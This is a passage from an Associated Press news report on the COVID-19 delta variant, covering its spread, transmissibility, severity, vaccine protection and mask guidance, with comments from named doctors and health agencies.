For instance, the mutant has forced Britain, where nearly half the population is fully vaccinated, to postpone for a month its long-anticipated lifting of COVID-19 restrictions, as cases are doubling about every nine days.

In the U.S., “we’re still vulnerable for these flare-ups and rebounds,” said Dr. Hilary Babcock of Washington University at St. Louis.

The variants “are able to find any gaps in our protection,” she said, pointing to how hospital beds and intensive care units in Missouri’s least-vaccinated southwestern counties suddenly are filling — mostly with adults under 40 who never got the shots.

With nearly half the U.S. population immunized, CDC’s Walensky said about 1,000 counties, mostly in the Midwest and Southeast, with vaccination rates below 30% “are our most vulnerable.”

But the variant poses the most danger in countries where vaccinations are sparse. Africa is seeing cases rise faster than ever before, partially driven by the mutation, the WHO said Thursday, while areas in Bangladesh that border India are also seeing a variant-fueled surge. Fiji, which got through the first year of the pandemic with just two virus deaths, is now experiencing a significant outbreak blamed on the strain, and Afghanistan is desperately seeking oxygen supplies because of it.

The delta variant remains far from the only version of the coronavirus that’s spreading — and you don’t want to catch any kind. Here’s what scientists know so far:

EASIER SPREAD IS THE CHIEF THREAT

Scientists believe the delta variant is about 50% more transmissible than other types. Researchers are just beginning to tease apart why. But there are early clues that some mutations may ease a key step in how the virus slips inside human cells, said Priyamvada Acharya, a structural biologist at the Duke Human Vaccine Institute.

Still, it’s not clear if higher contagion is the whole reason the variant is spreading so quickly. In Britain, its rise followed a loosening of restrictions in May, when restaurants, gyms and other businesses reopened, and thousands of fans have attended sports events.

IS IT MORE DANGEROUS?

It’s harder to tell if the delta variant makes people sicker. British experts have said there are some preliminary signs it may increase hospitalization, but there’s no evidence it is more lethal.

It fueled a devastating COVID-19 surge in India in February, and “this time around we had a lot more people who were very sick compared to before,” said Dr. Jacob John of Christian Medical College at Vellore. But he cautioned that the “explosion” of cases didn’t necessarily mean this version was more dangerous, as more cases usually mean more hospitalizations.

THE BEST PROTECTION IS FULL VACCINATION

British researchers found two doses of either the Pfizer-BioNTech vaccine or the AstraZeneca one were only slightly less effective at blocking symptomatic illness from the delta variant than from earlier mutations — and importantly, remain hugely protective at preventing hospitalization.

But there’s an important catch: Just one dose proved far less effective against the delta variant than against earlier versions of the virus. That has prompted Britain, which originally extended the gap between doses, to speed up second shots.

There’s little information on whether the delta variant can escape other vaccines, such as ones developed in China or Russia.

Experts say the Moderna vaccine, the same type as Pfizer’s, should be similarly protective. Johnson & Johnson still is studying how its one-dose vaccine fares against the variant. The company notes its shot does protect against a different worrisome mutant — the so-called beta variant that emerged in South Africa and is still considered the biggest challenge for today’s COVID-19 vaccines.

WHAT ABOUT MASKS?

The WHO has urged governments not to lift pandemic restrictions too quickly — including saying everyone, even the vaccinated, should continue to wear masks given that the delta variant spreads more easily and no vaccine is 100% effective.

In the U.S., the CDC maintains it still is safe for the fully vaccinated to go mask-free. But there’s no way to know if maskless people really are vaccinated and local governments can set tighter guidelines. This week, with the delta variant spreading locally, health officials in Los Angeles County said they still recommend masks indoors in public places for everyone.

If that’s confusing, consider that the more the virus is spreading in a particular area, the more risk even the vaccinated have of getting a mild or asymptomatic infection they could spread to someone not protected — such as children too young to qualify for the shots.

In Missouri, fully vaccinated Babcock makes sure she has a mask to pop on quickly if she runs into a crowd: “I feel like my new normal is holding a mask in my hand, ready to put it on if I need it.”

___

Associated Press writers Maria Cheng in London and Aniruddha Ghosal in New Delhi contributed to this report.

___

The Associated Press Health and Science Department receives support from the Howard Hughes Medical Institute’s Department of Science Education. The AP is solely responsible for all content.